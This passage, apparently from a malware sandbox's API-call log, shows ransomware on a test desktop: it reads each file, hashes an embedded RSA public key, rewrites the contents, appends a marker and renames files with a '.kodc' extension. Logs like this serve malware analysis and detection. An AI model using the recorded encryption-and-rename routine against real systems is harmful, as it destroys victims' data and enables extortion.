dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0097.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.890] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18f52, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.890] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.891] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.891] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.891] CloseHandle (hObject=0x5cc) returned 1 [0097.892] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urNMQz.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\urnmqz.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urNMQz.bmp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\urnmqz.bmp.kodc")) returned 1 [0097.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.893] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0097.894] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf257d860, ftCreationTime.dwHighDateTime=0x1d5b9ff, ftLastAccessTime.dwLowDateTime=0x32ef9040, ftLastAccessTime.dwHighDateTime=0x1d5c47b, ftLastWriteTime.dwLowDateTime=0x32ef9040, ftLastWriteTime.dwHighDateTime=0x1d5c47b, nFileSizeHigh=0x0, nFileSizeLow=0x1482b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v3m_7Lp.pdf", cAlternateFileName="")) returned 1 [0097.894] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v3m_7Lp.pdf") returned=".pdf" [0097.894] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v3m_7Lp.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v3m_7lp.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.895] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=84011) returned 1 [0097.895] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.898] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14805, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.898] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.899] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.899] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x1482b, lpOverlapped=0x0) returned 1 [0097.899] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.900] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.900] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.900] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.900] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0097.900] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.900] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.900] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.901] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.901] GetLastError () returned 0x0 [0097.901] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.901] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0097.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.901] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.901] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.901] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14830) returned 0x9ba4d90 [0097.901] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33401d0 [0097.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a748 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340218 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a760 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a790 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7a8 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.902] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0097.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a790 | out: hHeap=0x630000) returned 1 [0097.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7a8 | out: hHeap=0x630000) returned 1 [0097.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a7a8 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a790 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7a8 | out: hHeap=0x630000) returned 1 [0097.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a790 | out: hHeap=0x630000) returned 1 [0097.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.903] GetCurrentThreadId () returned 0x42c [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696578 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.903] GetCurrentThreadId () returned 0x42c [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a790 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7a8 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a778 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a7c0 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a790 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a790 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0097.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0097.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a790 | out: hHeap=0x630000) returned 1 [0097.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7c0 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7a8 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a778 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0097.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0097.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a760 | out: hHeap=0x630000) returned 1 [0097.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3340218 | out: hHeap=0x630000) returned 1 [0097.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0097.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0097.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0097.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0097.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0097.906] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x14826, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x14826, lpOverlapped=0x0) returned 1 [0097.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0097.906] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1482b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.907] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0097.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0097.907] 